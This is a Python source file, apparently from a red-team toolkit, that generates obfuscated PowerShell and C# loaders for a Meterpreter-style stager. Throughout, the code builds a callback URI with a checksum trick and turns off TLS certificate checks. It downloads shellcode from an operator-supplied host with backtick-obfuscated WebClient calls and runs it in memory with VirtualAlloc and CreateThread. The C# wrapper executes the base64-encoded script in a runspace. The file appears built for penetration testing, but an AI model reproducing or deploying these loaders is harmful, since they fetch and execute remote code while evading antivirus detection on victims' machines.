github.com/Coalfire-Research/Slackor@v0.0.0-20191010164036-aa32a7f9250b/SpookFlare/lib/sfmpps.py (about) 1 # -*- coding: utf-8 -*- 2 import random 3 import string 4 import base64 5 from base64 import b64encode 6 7 def randomString(): 8 return ''.join([random.choice(string.ascii_letters) for n in range(12)]) 9 10 def checksum8(s): 11 return sum([ord(ch) for ch in s]) % 0x100 12 13 def genHTTPChecksum(): 14 chk = string.ascii_letters + string.digits 15 for x in range(64): 16 uri = "".join(random.sample(chk,3)) 17 r = "".join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random())) 18 for char in r: 19 if checksum8(uri + char) == 92: 20 return uri + char 21 22 def generateMPPSLoader(mpProto, mpLhost, mpLport, mpArch, mpSsize): 23 if mpArch == "x86": 24 mpArch = "ToInt32" 25 mpDef = "UInt32" 26 elif mpArch == "x64": 27 mpArch = "ToInt64" 28 mpDef = "UInt64" 29 30 if mpProto == "https": 31 mpPSSSLChk = "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}" 32 else: 33 mpPSSSLChk = "" 34 35 loaderHost = mpProto+"://"+mpLhost+":"+mpLport+"/"+genHTTPChecksum() 36 baseMetPs = '''${0} = @" 37 [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, {8} dwSize, {8} flAllocationType, {8} flProtect); 38 [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, {8} dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, {8} dwCreationFlags, IntPtr lpThreadId); 39 [DllImport("kernel32.dll")] public static extern {8} WaitForSingleObject(IntPtr hHandle, {8} dwMilliseconds); 40 "@; 41 {10} 42 ${1} = New-Object "`N`et.`W`ebc`l`i`ent";${1}.Headers.Add("User-Agent", "Mozilla/5.0 (compatible; MSIE 11.0; Trident/7.0; rv:11.0)");${1}.Headers.Add("Accept", "*/*");${1}.Headers.Add("Accept-Language", "en-gb,en;q=0.5");[Byte[]] ${2} = ${1}."D`o`wn`l`oa`d`Data"("{9}");${3} = New-Object byte[] (${2}.Length - {4});[Array]::Copy(${2}, {4}, ${3}, 0, (${2}.Length - {4}));${5} = A`d`d-T`y`p`e -memberDefinition ${0} -Name "Win32" -namespace `W`in`3`2`F`un`ct`i`on`s -passthru;${6}=${5}::VirtualAlloc(0,${3}.Length,0x3000,0x40);[Runtime.InteropServices.Marshal]::Copy(${3}, 0, [IntPtr](${6}.{7}()), ${3}.Length);${5}::CreateThread(0,0,${6},0,0,0) | oUT-NuLl;`S`T`A`R`T-`S`l`e`E`p -s `8`6`4`2`0''' 43 44 loaderFinal = baseMetPs.format(randomString(), randomString(), randomString(), randomString(), mpSsize, randomString(), randomString(), mpArch, mpDef, loaderHost, mpPSSSLChk) 45 return loaderFinal 46 47 def generateMPPSCsharpLoader(mpPsCode): 48 mCsharpCode = '''using System; 49 using System.IO; using System.Diagnostics; using System.Reflection; using System.Runtime.InteropServices; using System.Collections.ObjectModel; using System.Management.Automation; using System.Management.Automation.Runspaces; using System.Text; 50 public class {0} {{ 51 public static void Main() {{ 52 byte[] {1} = Convert.FromBase64String("{6}"); 53 string {2} = Encoding.UTF8.GetString({1}); 54 Runspace {3} = RunspaceFactory.CreateRunspace(); 55 {3}.Open(); 56 RunspaceInvoke {4} = new RunspaceInvoke({3}); 57 Pipeline {5} = {3}.CreatePipeline(); 58 {5}.Commands.AddScript({2}); 59 {5}.Invoke(); 60 {3}.Close(); 61 return; 62 }} 63 }}''' 64 65 loaderFinal = mCsharpCode.format(randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), b64encode(mpPsCode.encode())) 66 return loaderFinal